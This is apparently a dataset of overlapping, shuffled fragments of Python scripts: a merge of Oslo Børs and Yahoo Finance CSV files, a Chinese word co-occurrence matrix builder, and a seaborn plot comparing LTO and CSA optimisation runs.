"df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the features from Yahoo", "FEEL makes # makes sense to include. 
df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors,", "features from Yahoo Finance # are very sparse, so here I am picking", "import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str):", "Yahoo Finance # are very sparse, so here I am picking the ones", "# are very sparse, so here I am picking the ones # that", "as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get filenames for", "= df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__ ==", "pd.read_csv(yahoo_name) # Some of the features from Yahoo Finance # are very sparse,", "very sparse, so here I am picking the ones # that are not", "Yahoo Finance and merges them to one large dataset. ''' df_bors = pd.read_csv(bors_name)", "I am picking the ones # that are not so sparse and that", "str, yahoo_name: str, result_filename: str): ''' Get filenames for csv files from Oslo" ]
[ "# print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()): # if", "matplotlib import fileDispose import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表", "import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench", "word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench", "re_matrix[i,n] += 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else:", "= 0 for i in range(len(text)): if(i % n == 0): lable =", "if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n", "def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable =", "def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench: for i", "\"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable = 0 for", "= get_bench(text,2) for sentence in bench: for i in range(len(sentence)): for j in", "0 for i in range(len(text)): if(i % n == 0): lable = i", "elif (len(word_listindex[k]) == 2): # shuangzi += 1 # else: # qita +=", "if(i % n == 0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return", "0 # shuangzi = 0 # qita = 0 # for k in", "np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable", "sentence in bench: for i in range(len(sentence)): for j in range(1,window+1): if(i-j >=", "return 
bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench:", "int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex =", "1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return", "== 2): # shuangzi += 1 # else: # qita += 1 #", "import matplotlib import fileDispose import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围", ">= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n =", "1 # elif (len(word_listindex[k]) == 2): # shuangzi += 1 # else: #", "# for i, (k, v) in enumerate(word_listindex.items()): # if i in range(0, 10):", "j in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j", "continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2)", "print(bench[:10]) # danzi = 0 # shuangzi = 0 # qita = 0", "qita = 0 # for k in word_listindex: # if (len(word_listindex[k]) == 1):", "# for k in word_listindex: # if (len(word_listindex[k]) == 1): # danzi +=", "co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench: for i in", "== 1): # danzi += 1 # elif (len(word_listindex[k]) == 2): # shuangzi", "bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in", "get_bench(text,2) for sentence in bench: for i 
in range(len(sentence)): for j in range(1,window+1):", "# print(bench[:10]) # danzi = 0 # shuangzi = 0 # qita =", "in range(len(text)): if(i % n == 0): lable = i continue else: text[lable].extend(text[i])", "bench = get_bench(text,2) for sentence in bench: for i in range(len(sentence)): for j", "print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()): # if i", "共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable = 0 for i in", "range(len(sentence)): for j in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] +=", "= 0 # qita = 0 # for k in word_listindex: # if", "in range(len(sentence)): for j in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n]", "re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench: for i in range(len(sentence)):", "danzi = 0 # shuangzi = 0 # qita = 0 # for", "1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence =", "print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()): # if i in range(0,", "qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k,", "i in range(len(sentence)): for j in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]])", "bench = get_bench(total_list,2) # print(bench[:10]) # danzi = 0 # shuangzi = 0", "shuangzi = 0 # qita = 0 # for k in word_listindex: #", "= fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench =", "continue return re_matrix total_list = 
fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) #", "return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json')", "in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <=", "in word_listindex: # if (len(word_listindex[k]) == 1): # danzi += 1 # elif", "bench: for i in range(len(sentence)): for j in range(1,window+1): if(i-j >= 0): n", "# if (len(word_listindex[k]) == 1): # danzi += 1 # elif (len(word_listindex[k]) ==", "1 # else: # qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita)", "0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]])", "fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) #", "int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1", "\"\"\" bench = [] lable = 0 for i in range(len(text)): if(i %", "== 0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex):", "n == 0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def", "as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 
text:文本列表 n:几句话合并 \"\"\" bench = []", "+= 1 # else: # qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) #", "= get_bench(total_list,2) # print(bench[:10]) # danzi = 0 # shuangzi = 0 #", "1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v) in", "+= 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v)", "= co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10])", "in bench: for i in range(len(sentence)): for j in range(1,window+1): if(i-j >= 0):", "n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n]", "= int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] +=", "bench = [] lable = 0 for i in range(len(text)): if(i % n", "for i in range(len(text)): if(i % n == 0): lable = i continue", "1): # danzi += 1 # elif (len(word_listindex[k]) == 2): # shuangzi +=", "0 # for k in word_listindex: # if (len(word_listindex[k]) == 1): # danzi", "i, (k, v) in enumerate(word_listindex.items()): # if i in range(0, 10): # print(k,", "fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2)", "shuangzi += 1 # else: # qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi)", "# danzi = 0 # shuangzi = 0 # qita = 0 #", "# shuangzi = 0 # qita = 0 # for k in word_listindex:", "= 0 # for k in word_listindex: # if 
(len(word_listindex[k]) == 1): #", "= 0 # shuangzi = 0 # qita = 0 # for k", "danzi += 1 # elif (len(word_listindex[k]) == 2): # shuangzi += 1 #", "range(len(text)): if(i % n == 0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable])", "text:文本列表 n:几句话合并 \"\"\" bench = [] lable = 0 for i in range(len(text)):", "lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int)", "range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)):", "= int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex", "n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json')", "# bench = get_bench(total_list,2) # print(bench[:10]) # danzi = 0 # shuangzi =", "for j in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1", "else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex)", "n:几句话合并 \"\"\" bench = [] lable = 0 for i in range(len(text)): if(i", "co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) #", "if (len(word_listindex[k]) == 1): # danzi += 1 # elif (len(word_listindex[k]) == 2):", "print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()): #", "for i, 
(k, v) in enumerate(word_listindex.items()): # if i in range(0, 10): #", "=np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench: for i in range(len(sentence)): for", "[] lable = 0 for i in range(len(text)): if(i % n == 0):", "k in word_listindex: # if (len(word_listindex[k]) == 1): # danzi += 1 #", "+= 1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence", "lable = 0 for i in range(len(text)): if(i % n == 0): lable", "0 # qita = 0 # for k in word_listindex: # if (len(word_listindex[k])", "i in range(len(text)): if(i % n == 0): lable = i continue else:", "= [] lable = 0 for i in range(len(text)): if(i % n ==", "# danzi += 1 # elif (len(word_listindex[k]) == 2): # shuangzi += 1", "# fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) # danzi", "get_bench(total_list,2) # print(bench[:10]) # danzi = 0 # shuangzi = 0 # qita", "# qita = 0 # for k in word_listindex: # if (len(word_listindex[k]) ==", "import fileDispose import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并", "# print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()): # if i in", "(k, v) in enumerate(word_listindex.items()): # if i in range(0, 10): # print(k, v)", "i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench =", "for k in word_listindex: # if (len(word_listindex[k]) == 1): # danzi += 1", "fileDispose import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 
\"\"\"", "text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence", "re_matrix[i,n] += 1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json')", "if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix", "(len(word_listindex[k]) == 1): # danzi += 1 # elif (len(word_listindex[k]) == 2): #", "print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) # danzi = 0 # shuangzi", "2): # shuangzi += 1 # else: # qita += 1 # print('单个字词个数:',danzi)", "for sentence in bench: for i in range(len(sentence)): for j in range(1,window+1): if(i-j", "(len(word_listindex[k]) == 2): # shuangzi += 1 # else: # qita += 1", "# shuangzi += 1 # else: # qita += 1 # print('单个字词个数:',danzi) #", "total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) #", "<= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix total_list", "0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix", "= fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') 
np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1])", "+= 1 # elif (len(word_listindex[k]) == 2): # shuangzi += 1 # else:", "= i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench", "for i in range(len(sentence)): for j in range(1,window+1): if(i-j >= 0): n =", "# else: # qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) #", "% n == 0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench", "bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench: for", "<filename>co-occurrence_matrix.py import matplotlib import fileDispose import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int)", "# print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()):", "len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix total_list =", "# print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) # danzi = 0 #", "else: # qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for", "re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence)", "get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable = 0 for i", "+= 1 if(i+j <= len(sentence)): n = 
int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue", "get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable = 0", "fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) # danzi =", "np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) # danzi = 0", "# elif (len(word_listindex[k]) == 2): # shuangzi += 1 # else: # qita", "numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench =", "# qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i,", "co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) #", "else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for", "word_listindex: # if (len(word_listindex[k]) == 1): # danzi += 1 # elif (len(word_listindex[k])" ]
[ "True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5", "alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\",", "len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\"", "data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs", "type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\",", "costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)),", "fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5),", "CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\"", "9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':'", "3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1", "len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs", "1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], 
data_CSA[\"Std costs CSA\"]),", "args.function popsize = 10 data_LTO = {} data_CSA = {} with open(lto_path) as", "1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1)", "np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) +", "= 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] =", "plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen *", "plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend()", "np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1,", "rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path):", "datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family']", "LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path',", "timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time))", "1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp =", "import seaborn as sns import 
matplotlib.pyplot as plt import argparse from datetime import", "= datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path,", "rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon']", "import argparse from datetime import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] =", "numpy as np import seaborn as sns import matplotlib.pyplot as plt import argparse", "parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to", "1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1", "plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma", "= 32 def dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not", "plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10)", "argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a file\"% path) parser = argparse.ArgumentParser(description='Script", "Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in", "\"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function,", "1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), 
color=sns.xkcd_rgb[\"magenta\"], alpha=0.1)", "json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations *", "generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\",", "len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs", "costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"])", "default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path", "= json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x',", "linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp)", "32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s", "data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"])", "rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize']", "= generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step", "import json import numpy as np import seaborn as sns import matplotlib.pyplot as", "costs 
